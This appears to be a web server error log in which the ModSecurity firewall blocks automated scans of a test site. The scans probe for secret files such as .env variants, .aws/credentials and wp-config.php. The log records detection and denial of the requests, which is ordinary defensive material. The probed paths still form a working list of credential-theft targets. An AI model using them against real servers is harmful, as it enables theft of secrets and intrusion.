[Fri Mar 28 00:38:02.111457 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSSwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:02.111838 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSSwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:02.166886 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSTAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:02.167161 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSTAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:02.167340 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSTAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:02.220890 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSTQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:02.221158 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSTQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:02.221328 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSTQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 05:25:34.678391 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-Ykvu6JzOzvChkXJd9i2wAAAAE"]
[Fri Mar 28 05:25:34.678697 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-Ykvu6JzOzvChkXJd9i2wAAAAE"]
[Fri Mar 28 05:25:34.678881 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z-Ykvu6JzOzvChkXJd9i2wAAAAE"]
[Fri Mar 28 05:25:34.713786 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-Ykvu6JzOzvChkXJd9i3AAAAAE"]
[Fri Mar 28 05:25:34.714029 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-Ykvu6JzOzvChkXJd9i3AAAAAE"]
[Fri Mar 28 05:25:34.714198 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z-Ykvu6JzOzvChkXJd9i3AAAAAE"]
[Fri Mar 28 05:25:34.749212 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-Ykvu6JzOzvChkXJd9i3QAAAAE"]
[Fri Mar 28 05:25:34.749461 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-Ykvu6JzOzvChkXJd9i3QAAAAE"]
[Fri Mar 28 05:25:34.749635 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z-Ykvu6JzOzvChkXJd9i3QAAAAE"]
[Fri Mar 28 05:25:34.784540 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-Ykvu6JzOzvChkXJd9i3gAAAAE"]
[Fri Mar 28 05:25:34.784775 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-Ykvu6JzOzvChkXJd9i3gAAAAE"]
[Fri Mar 28 05:25:34.784952 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-Ykvu6JzOzvChkXJd9i3gAAAAE"]
[Fri Mar 28 05:25:34.819901 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /settings/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "Z-Ykvu6JzOzvChkXJd9i3wAAAAE"]
[Fri Mar 28 05:25:34.820137 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "Z-Ykvu6JzOzvChkXJd9i3wAAAAE"]
[Fri Mar 28 05:25:34.820322 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "Z-Ykvu6JzOzvChkXJd9i3wAAAAE"]
[Fri Mar 28 05:25:34.927092 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yml
[Fri Mar 28 05:25:34.962024 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Fri Mar 28 05:25:35.106109 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.ini
[Fri Mar 28 05:25:35.334891 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-Ykv-6JzOzvChkXJd9i5wAAAAE"]
[Fri Mar 28 05:25:35.335127 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-Ykv-6JzOzvChkXJd9i5wAAAAE"]
[Fri Mar 28 05:25:35.335332 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z-Ykv-6JzOzvChkXJd9i5wAAAAE"]
[Fri Mar 28 05:25:35.633739 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Fri Mar 28 05:25:35.668667 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.yaml
[Fri Mar 28 05:25:35.755615 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/helm
[Fri Mar 28 05:25:35.790980 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z-Ykv-6JzOzvChkXJd9i8QAAAAE"]
[Fri Mar 28 05:25:35.791227 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z-Ykv-6JzOzvChkXJd9i8QAAAAE"]
[Fri Mar 28 05:25:35.791412 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z-Ykv-6JzOzvChkXJd9i8QAAAAE"]
[Fri Mar 28 05:25:35.826339 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-Ykv-6JzOzvChkXJd9i8gAAAAE"]
[Fri Mar 28 05:25:35.826585 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-Ykv-6JzOzvChkXJd9i8gAAAAE"]
[Fri Mar 28 05:25:35.826751 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z-Ykv-6JzOzvChkXJd9i8gAAAAE"]
[Fri Mar 28 05:25:36.017853 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "Z-YkwO6JzOzvChkXJd9i9gAAAAE"]
[Fri Mar 28 05:25:36.018206 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "Z-YkwO6JzOzvChkXJd9i9gAAAAE"]
[Fri Mar 28 05:25:36.018423 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "Z-YkwO6JzOzvChkXJd9i9gAAAAE"]
[Fri Mar 28 05:25:36.053142 2025] [authz_core:error] [pid 2084672] [client 170.39.218.72:6348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.bak
[Fri Mar 28 05:25:36.144604 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z-YkwO6JzOzvChkXJd9i-QAAAAE"]
[Fri Mar 28 05:25:36.144847 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z-YkwO6JzOzvChkXJd9i-QAAAAE"]
[Fri Mar 28 05:25:36.145051 2025] [:error] [pid 2084672] [client 170.39.218.72:6348] [client 170.39.218.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "Z-YkwO6JzOzvChkXJd9i-QAAAAE"]
